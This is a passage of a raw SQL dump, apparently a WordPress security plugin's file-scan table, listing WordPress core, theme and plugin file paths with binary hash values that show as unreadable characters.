\"','���H&�(hn�U�-z$���&��Egj[�M�','',0,'?'),('rK�<v�?�y��43z@','wp-includes/wp-includes/blocks/rss/block.json',0,'_Fɠm(��nJ��ZEG','_Fɠm(��nJ��ZEG','�S�5��X��9������mOX�>s��l��','',0,'?'),('r_��YrL�8�;��8E','wp-content/plugins/wp-cerber/assets/flags/ua.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V i��#Ʉ\r','�۽����,jI�7=3I�\0������\"�M7H','',0,'?'),('rd�%�NϱjU\0��Fm�','wp-includes/wp-includes/Requests/IPv6.php',0,'��K�N���knT�','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('re��\'۷�11d��8�','wp-content/themes/twentytwentyone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b/��RפH�{V���','2@:Uo�+�UJ7���˄�&yS���c�j��','',0,'?'),('rhVf&�Pt��瞶�','wp-includes/wp-includes/widgets/class-wp-widget-media-image.php',0,'�dCa�*C^e~OriA�','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('rr�\r�\n SC\'/H�','wp-content/themes/promote/inc/kirki/includes/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7GF��<��hZ','��Ae�/;Rha��*\n;���s�/�>#8�N�\0','',0,'?'),('rt�Ig[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ�� ���� N$ � EК���e�$','',0,'?'),('rz\0rݡ�\"f/�AKI','wp-includes/wp-includes/js/mediaelement/mejs-controls.png',0,'�.۷Z#e0�<�l���','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('r��)����d��RD�2','wp-content/plugins/wordfence/js/wfdashboard.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('r��,e���������','wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js',0,'��KaJ�d���J\'^','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҋ$����(����','���sݝ���&��գʆ#�_�`�X','',0,'?'),('r��WI� \'�H� f~X','wp-content/themes/weblog/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���G�;��d��','�y��\'�(�;DZ���&Ȩ�.6a�w���JG3','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�ҵ�F��K�K��$��','���w�U��*S�������0ϙ�P7z�','',0,'?'),('r���J�7ә�Dpf�8[','wp-content/themes/vision-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��LYG\Z\\�\ZcJC�','�4�mͬ~���g;�\',� ?�O_� N�','',0,'?'),('r�.?xL�(o�{��','wp-content/themes/advance/inc/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x<��+CǯU���m','5K�X���gٱ�#$W���p+D����','',0,'?'),('r��9��;j��|','wp-includes/wp-includes/js/dist/dom.min.js',0,'���k��\"���MM�','���k��\"���MM�','D�I�&�\"�H��-���Q࣋�Fzֱ�ev�','',0,'?'),('r�\n�����s�','wp-includes/wp-includes/sodium_compat/lib/namespaced.php',0,'01����vnG��\r�','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('r�����q�/4g��B�','wp-includes/wp-includes/images/w-logo-blue-white-bg.png',0,'\0�Ȉk�|�Ѽ���','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[��� s','��8`9ڰn�-.� H�Dp��k+�γ��bI','',0,'?'),('r��4�:���@s�','wp-content/themes/wp-barrister/full-width-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�!�P6�A[��','R}{���ub�/��U$��o~e�q]��W�A','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���f�}��E\\','E�:�#��P�c;�&��T�$G@�\Zrp�J�iR','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٥r��zż��S�5�','D{%WQ����Ȱ2����-\\�����l','',0,'?'),('s\0�<1q�{*гO��','wp-content/themes/pine/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=o��� ��bز��p','Θ��sG�`W��\'0~����$+wo<��E�','',0,'?'),('s&�繗�DCl�s�H','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������!�<�9�Ӫ','��:̶&E �\0@ؼ�k�P� �n2R�I�','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('s�OP5���Xua-(O�','wp-content/themes/newsmag/assets/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'ē�5p�ovԊ�m�\r�','�Qv�L{��m�������A�G��rI*�','',0,'?'),('s�?�͗ya�=�.�','wp-content/themes/spidermag/assets/images/preloader/horizon.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7n�T�kגR�z�u\Z','\'�ʾV�W:�y�z����9@�ɯ�;c���T;�J8','',0,'?'),('sh�,-N��$b�x|','wp-content/themes/hueman/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�-�CY=��nk','��ҟK0Ė�3�����&]�� �/@�w%��V�','',0,'?'),('sL�fQ\\F�\'$g����','wp-content/themes/newsmag/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{�bl��*���y','�T�D������e���o��|�4^&\"�d���t','',0,'?'),('sjt�\n�V�� ��(','wp-includes/wp-includes/js/wp-emoji.min.js',0,'+g�D>�w�f�م*�D','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('s��6���u\r��*�w^','wp-content/themes/kidzoo-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S2�#���$ �W�V/','��\nj3��}�I�W�H�C�i�u֮χik��3:�.','',0,'?'),('s�S5x�{��/����0','wp-content/themes/newsmag/template-parts/banner/banner-adsense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*8�\rC5�b+���Sd','b��*�7���)��͞W�x�ȼ-�\0y{A�R','',0,'?'),('s��[B����lE���','wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js',0,'�*NȒmQ������','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('s��ӣJ���~��k','wp-content/plugins/akismet/views/stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�JJuw��&�R{��','w�ü}\Z�O�g��� f#�E�1g=g�Rz��F','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[ʦ�]��M ��','Y�g_��~��\"��%��ٍ���[#u�دv�','',0,'?'),('s��p�Z���HXdx�T','wp-content/themes/hueman/assets/front/img/header/bridge-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oF��_��PҴH�O','��Q�����h�M�.u^Ȯ}��>��5-�','',0,'?'),('s��(:ӣ$������\r','wp-content/themes/twentynineteen/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�x̣���ۍJ��','�����X�e�����M�<!K��\0��ᆧ','',0,'?'),('s�]��P�f���\n','wp-content/themes/twentynineteen/sass/variables-site/_columns.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�+<����>3���K','w�0�̃�|^�;�Ym����n�L��i2��4�','',0,'?'),('s�uĸ��_��Rv4','wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js',0,'�J����p�°�5Q�','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('s����Y�\'�N|��)','wp-includes/wp-includes/js/jquery/jquery.min.js',0,'�� 3i��7�L�1�<','�� 3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('sՉ���m����LV�3�','wp-includes/wp-includes/js/dist/vendor/react.js',0,'��d:�K��D��,$','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e�� �n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s���E(�>N\'�b�ZҌ','wp-content/themes/gambit/css/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\' ��N깛���V','�?���ǵ�_-ϟ��b7b�\Z� �\'�fp>UG\0','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('ta�˞a郛��|�E','wp-content/themes/hueman/assets/czr/css/lib/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�F�J��.��1�','L�}���߈Z���w�r?u��������','',0,'?'),('t���j6 ��f�a�','wp-content/themes/Yegor/functions.php',0,'�.Ra��\"LOu�x��','�.Ra��\"LOu�x��','-��*Vi���9:Sx�S�m!\nB.��YLJ `','',0,'?'),('t\r�[��Ձ9*5W�b��','wp-includes/block-patterns/text-two-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('t�{*��aM��r̎','wp-content/plugins/wp-cerber/assets/flags/tt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wp}y����œ�_.�','D�qY\'�?t���}�u���t!��_r^��','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('t/���4�YK@����gm','wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',0,'Q�$������42��','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('t2�yIF!a!j*�kM�%','wp-content/themes/vision-lite/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1)W�k�TέG��','��\"1�٧��̲%P_m�wY|v�^c�g�\"�','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ct��ݦq�CI','�T�xY�q���*��sP�J�ƶ.���+ʩ�Z','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('tFS}m��JT�`@��-','wp-includes/wp-includes/js/media-models.min.js',0,'Ӷsj�~�MP����+','Ӷsj�~�MP����+','���7��}Z��9��ڜ<r���kV~��','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('te�i��:�t�<�_','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��\'���[��4 �','k�[�?��2��8n�h���C�Z2���DL9O��','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bq�9���\ngI�+','�(���%�$CkO\r����=0�d[qˡ�','',0,'?'),('tm�\n��GO \'�\Z','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����IJi��\r���','�P��<\n��+�q� ��NJ�+��s���b���','',0,'?'),('t�����.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('t��@4����m�','wp-content/themes/anima/admin/images/magazine-1col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��|�fdL�.','��$b�(兼���uj�v�F�ˤ7�I','',0,'?'),('t�����#���~�Grƒ','wp-includes/wp-includes/widgets/class-wp-widget-categories.php',0,'Bb��w�8�[�&�-Y','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('t��\Z�0M�!���]�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zEJ �K�*��r','�wG$�ˤM:�ǢSek��#-�¹�t��Rq��','',0,'?'),('t��T�U�1��{��','wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php',0,'��Hx+�07��`�}�','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('t� �<� R�f�;','wp-content/themes/hueman/assets/front/img/demo/5-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �jp�\"��jF���#','�(�1��id��C$\"��7Bj�j˺�\Z�J{�5�','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N �\'G','�fX��RZ�|:O�b��=f�[y���5 ~ ','',0,'?'),('utC�f��IP����','wp-includes/wp-includes/class-walker-category.php',0,')��2�G�E����;H�',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('uKPL\r��Lt�l��','wp-content/themes/maxbusiness/images/slide1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' КI����8]���]','L��)�M�؈a�ڬO4a ^L���|�Ew(��','',0,'?'),('u�Z�X9���N �ː','wp-includes/wp-includes/ID3/module.audio-video.quicktime.php',0,'�Ր��%���3/�*','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('u�T�ڃ�@.W�2|4','wp-includes/wp-includes/class-wp-image-editor-imagick.php',0,'�U��--�� �2��6','�U��--�� �2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('u3۔�p���y���','wp-content/themes/advance/inc/kirki/assets/js/controls/color-palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\n!eO$2�`8�0]�}','�E&�VM��>(O��?H-�/#biCB�W','',0,'?'),('uC,�X)��b�M���','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�!�m+���FA+Ԝ','����P���Y3ױ�_�L1�LIL�6qg�%�','',0,'?'),('uEYQw0��%��','wp-content/themes/skt-pathway/css/style_base.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-}�B�Ϫ�}�G�u','�B�7�EhK�p)>�x��D+��b4�<�#��a','',0,'?'),('uK˒2(_u��B\r���','wp-includes/wp-includes/js/jquery/jquery-migrate.js',0,'�\0�6��?ٳ��t�\r','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('ue�,\"\n �h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&�������������s-�','',0,'?'),('umU9Sej�F�q�\nrg','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����G�Q�',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('up�ɍ��D����','wp-content/themes/newsmag/assets/vendors/owl-carousel/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0 rZν(m�x�N�','�W�pwфjM��߅����R�w؝����4','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��:o;J��\n���b','[d�%>��[�l�����[�,0o_IX>ڦ2�','',0,'?'),('u�)��KUy�tvH\\','wp-content/themes/shopone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʷ�w0F�-�A4�','w�~\rN��x�ԙΉ�*����}\n�/��(�F','',0,'?'),('u��I5q�#��,>�','wp-content/themes/twentytwentyone/assets/js/primary-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɱ�\rA2���e','ʟ�]b���F��ң���^�Ex��D�','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('uÇ��U\rģ[�R�7,�','wp-content/themes/anima/admin/main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�9�@[ߊ�n���J','26݂���(+#X�M�l�S�Ġ���Fll|','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u�@@�� �����N6','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',0,'�E��ƀk�vk��\r','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN �','',0,'?'),('u�#���b�ѵH�','wp-content/themes/anima/admin/images/3cSl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nCt p��i���\Z��N','��Z�Q��N�#�_~��P��*P88�t�RX','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('u�������m)Kli','wp-content/themes/hueman/assets/front/img/opacity-10.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�e%�Oׁ��8V&R','�}P�l���ulXm����IR��ܼd�ܗ�','',0,'?'),('v\0�x��^)��>(yJ','wp-content/themes/wp-barrister/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0b��S��!�J$\'�','�$b_�\"b�1-C����]�Xl~6�����/�','',0,'?'),('vڴ����V���K��P','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PNڡ\'f���','\r]�~[�������_˳�P�B�TA`��*,O','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZE)�-0�M�;���h','2ꦢ�3l\'k��c�{�=ߺ��$[��&Of��','',0,'?'),('v��]��R���ҒG�','wp-content/themes/sg-window/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I���x\'�WIվ��','mU�\r���z����JFK�Ӓ��A�','',0,'?'),('v�f��5bI�^�6(�','wp-content/themes/auberge/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�y�gE��V','X���r!�O=\n�\">\\{|p#;��o�N��p��','',0,'?'),('v;0Ʌ��c��b{���','wp-content/themes/pine/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�C,�V1�����',']�{��+�-M�dE1�4U�f�;�qx!]�','',0,'?'),('vK;@�s�aU1;� ^�','wp-config.php',0,'���w~���gh[C��','���w~���gh[C��','���`�@5WG~���R�˴V,[Jxa�7Ꮾ','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('vW�X�r�\Z��TP��\n�','wp-content/themes/spidermag/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-��;� �4)ӡ','Kx����\Z:�L���><}�f��0����M#lp','',0,'?'),('vY���a�?��\\h�} 7','wp-includes/wp-includes/ID3/getid3.lib.php',0,'CPb$M6̟��ҁ�','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('va�S^�\0�Y���A�','wp-content/themes/storeone/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���$�z끢`�8\\','�A����t-Л�f�OJ�]�I�I�����f','',0,'?'),('ve\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u�� ','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v}P�`~��|$�7�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��2�<9Ѿ�_J�','�xSh���IcU9�X�<FfjT\'h�چ��D�','',0,'?'),('v~��c��hTxI�����','wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js',0,'���s�/�q��','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�L\0�4Wd�n�tG��','X\\�m��ؓ�>^\'�_4У��4ԗ����uV0','',0,'?'),('v���%��3Z[P$�','wp-content/themes/gambit/css/flexslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�����E�S�,8','?f��Xik���3�t^(6���n��G/�~��M','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('v�5�-8גB\'���','wp-content/themes/hueman/parts/page-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���QA@�PS����\Z','�j}R����i��p=R��F/���w��y�','',0,'?'),('v�����v̞e�tѿ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Oa��Y�?ai�0@6','\r�L&ބ��\0�}����mu�LJ���i..5G��l','',0,'?'),('v�͎ö\"�>+�~彁�','wp-content/themes/advance/parts/salider-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�A��%�-=!�','��|����?#ڴ��Z�y*xt�6�E','',0,'?'),('v���\n��F�p:%/','wp-content/themes/promote/inc/kirki/assets/js/controls/radio-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B_-\rs��NJ+��','� �2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v���DQ�~�1��X[3','wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js',0,'t��|�eɤs^�Q�','t��|�eɤs^�Q�','���f��i7� �L�:��r;�8\"�h<s�P�','',0,'?'),('v�yYp��%;rp\nq>+','wp-content/themes/skt-pathway/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�i���-΅Cj0','�05���`��O�Uf2\\��A�\Z�H�3�','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v�@<w�m&���6�','wp-includes/wp-includes/css/dashicons.min.css',0,'֍k����U�о�3�','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������8��B#','���{)�\"�;?�ϙXGDI�RD?K@^X���P','',0,'?'),('v�����rԋ��a�','wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js',0,'B7�I1�0�����d�','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��l� 